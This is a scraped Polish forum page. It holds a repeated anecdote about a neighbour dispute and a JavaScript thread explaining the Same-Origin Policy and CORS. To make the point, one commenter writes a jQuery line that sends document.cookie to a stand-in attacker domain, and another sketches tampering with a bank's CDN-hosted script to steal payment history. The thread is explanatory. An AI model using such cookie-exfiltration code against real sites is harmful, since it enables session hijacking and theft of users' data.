Aktywne Wpisy
rozqrwiciel +852
Dostałem przedsądowe wezwanie do zaprzestania naruszania dóbr osobistych, bo na osiedlowej grupie napisałem czym się trudni jedna z sąsiadek, która się wcześniej do mnie #!$%@?ła xDD
Co 1-2 tygodnie znajoma "Pani ze wsi" dostarcza mi jajka, jakieś warzywa i inne produkty z własnego gospodarstwa. Najczęściej jestem w mieszkaniu, więc od niej odbieram, czasami jak mnie akurat nie ma to otwieram jej zdalnie drzwi, zostawia, wychodzi.
Na grupie mieszkańców "elitarnego i priestiżowego" osiedla, które przyszło mi zamieszkiwać, ktoś wrzucił jej zdjęcie z pytaniem, dlaczego "takie osoby" są wpuszczane przez ochronę. Kilka osób (głównie Karyny) poparły, że przecież trzeba dbać o azyl, o bezpieczeństwo (czyt. jak ktoś nie nosi przynajmiej Gucci czy innego gówna to nie powinien przekraczać progu, żeby nie zaburzać poczucia estetyki szanownych państwa jego mać...). Szczególnie jedna Karyna spruła się dość mocno, że sobie nie życzy, że będzie interweniować itp.
Uprzejmie
Co 1-2 tygodnie znajoma "Pani ze wsi" dostarcza mi jajka, jakieś warzywa i inne produkty z własnego gospodarstwa. Najczęściej jestem w mieszkaniu, więc od niej odbieram, czasami jak mnie akurat nie ma to otwieram jej zdalnie drzwi, zostawia, wychodzi.
Na grupie mieszkańców "elitarnego i priestiżowego" osiedla, które przyszło mi zamieszkiwać, ktoś wrzucił jej zdjęcie z pytaniem, dlaczego "takie osoby" są wpuszczane przez ochronę. Kilka osób (głównie Karyny) poparły, że przecież trzeba dbać o azyl, o bezpieczeństwo (czyt. jak ktoś nie nosi przynajmiej Gucci czy innego gówna to nie powinien przekraczać progu, żeby nie zaburzać poczucia estetyki szanownych państwa jego mać...). Szczególnie jedna Karyna spruła się dość mocno, że sobie nie życzy, że będzie interweniować itp.
Uprzejmie
PetalMind +210
Aktywne Znaleziska
#javascript #webdev #pytanie
Może ktoś wyjaśni sytuację, w której to rzeczywiście cokolwiek chroni.
@ogur:
@Ginden: Jeśli tego również dotyczy SOP to nie, tego nie chcę ale to da się oddzielić akurat, gorzej jakbym używał twojego kodu wewnątrz swojej strony ale też nie o to mi chodzi tylko o plik JSON pobierany przez XHR.
@Marmite: CORS działa, jeśli serwer na to pozwala. ;( Czy to blokowanie po strony serwera ma jakiś sens? Bo jakby nie wiele ma to wspólnego z SOP.
@mala_slodka_eklerka: W
@look997: Taaaa? A co jeśli zrobiłbym coś takiego:
$.ajax('[http://evildomain.com/safefile.json?oopsThisIsPrettyUnsafe=](http://evildomain.com/safefile.json?oopsThisIsPrettyUnsafe=) '+encodeURIComponent(document.cookie))Serwer zwraca JSON, ale przy okazji dostaje całe cookies w ścieżce. Sorry, SOP jest potrzebne. Wektorów ataku jest mnóstwo.
@look997: Jest. Wyobraź sobie, że bank ma swoją stronę na Angularze czy Emberze, a dane o rachunku są w pliku JSON.
@look997: Możesz odczytać dowolną informację ze strony i przesłać ją na dowolny serwer. Wyobraź sobie że włamuję się do popularnego CDN-a, z którego korzysta twój bank, i do pliku z frameworkiem doklejam bardzo króciutki fragment kodu, który uaktywnia się na stronie z historią płatności, odczytuje ją i wraz z twoimi danymi wysyła do mnie.
Muszę to na spokojnie zanalizować a wy powiedzcie ,czy tak się da?
@look997: Akurat XHR "bez cookies" są dość bezpiecznym pomysłem, tak przynajmniej mi się wydaje i myślę, że mogłyby zastąpić wiele JSONP.
@Marmite: Przykład z CDNem jest zły, bo wtedy możesz dodać kod przelewający złoto na Twoje konto. :P
Dodatkowe pytanie: Czy blokada następuje po stronie przeglądarki, bo jest sytuacja, gdzie używam CORS i taki skrypt i tak jest blokowany. W konsoli pisze, że trzeba skonfigurować odpowiednio serwer. Ale Czy to serwer coś blokuje, czy p prostu przeglądarka nie przyjmuje pliku z serwera, który nie zwraca jakiejś flagi czy
Ale brzmi coś jak "w zapytaniach HTTP nie możesz wysyłać znaków ", ` i ', bo można je wykorzystać do SQL Injection".
Blokada jest po stronie przeglądarki.
Chodzi o to, żebyś po wejściu na stronę jakiegoś mirka nie pobrało Ci historii z banku.
Czyli bank ustawia CORS tylko na swoje domeny. Mirek napisał skrypt, który próbuje pobrać dane z bank.pl/history
Przeglądarka DOSTAJE dane z banku, tylko że w nagłówku widzi "CORS: bank.pl, bank.com.pl" i nie daje dostępu